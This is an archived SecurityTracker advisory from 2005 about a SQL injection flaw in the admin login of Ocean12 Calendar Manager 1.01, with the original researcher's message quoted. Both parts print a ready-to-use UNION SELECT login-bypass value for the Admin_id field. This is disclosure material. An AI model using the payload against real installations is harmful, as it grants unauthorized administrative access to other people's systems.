SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Calendar)  >   Ocean12 Calendar Manager Vendors:   Ocean12 Technologies
Ocean12 Calendar Manager Input Validation Errors Permit SQL Injection Attacks
SecurityTracker Alert ID:  1013762
SecurityTracker URL:  http://securitytracker.com/id/1013762
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 19 2005
Impact:   Disclosure of system information, Disclosure of user information, User access via network
Exploit Included:  Yes  
Version(s): 1.01
Description:   Zinho from Hackers Center reported a vulnerability in Ocean12 Calendar Manager. A remote user can inject SQL commands.

The admin login panel does not properly validate user-supplied input in the the 'Admin_id' and 'Admin_password' fields. A remote user can supply specially crafted values to execute SQL commands on the underlying database and gain administrative access on the application.

A demonstration exploit value is provided:

Admin_id: Admin' UNION ALL SELECT
id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,i
d,id FROM settings WHERE Admin_id='Admin

Admin_password: 1

The vendor has been notified.

Impact:   A remote can execute SQL commands on the underlying database. This can be exploited to gain administrative access on the application.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.ocean12scripts.com/products/calendar/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [HSC Security Group] Ocean12 Calendar manager 1.01 SQL injection


Hackers Center Security Group (http://www.hackerscenter.com/)      
Zinho's Security Advisory       


Product: Ocean12 Calendar manager 1.01
Site: www.ocean12scripts.com

The admin login panel suffers of an sql injection that allows anyone
to log in as Admin.

Proof of concept:
///
- Admin_id: Admin' UNION ALL SELECT  
id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,id,i
d,id FROM settings WHERE Admin_id='Admin

Admin_password: 1

///

Vendor has been contacted some weeks ago. No response received so 
far.




Author:       
Zinho is webmaster and founder of http://www.hackerscenter.com ,    
Security research   portal     
Secure Web Hosting Companies Reviewed:    
http://www.securityforge.com/web-hosting/secure-web-hosting.asp    

zinho-no-spam @ hackerscenter.com      


====>
Webmaster of
.:[ Hackers Center : Internet Security Portal]:.
http://www.hackerscenter.com
http://www.securityforge.com/web-hosting
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC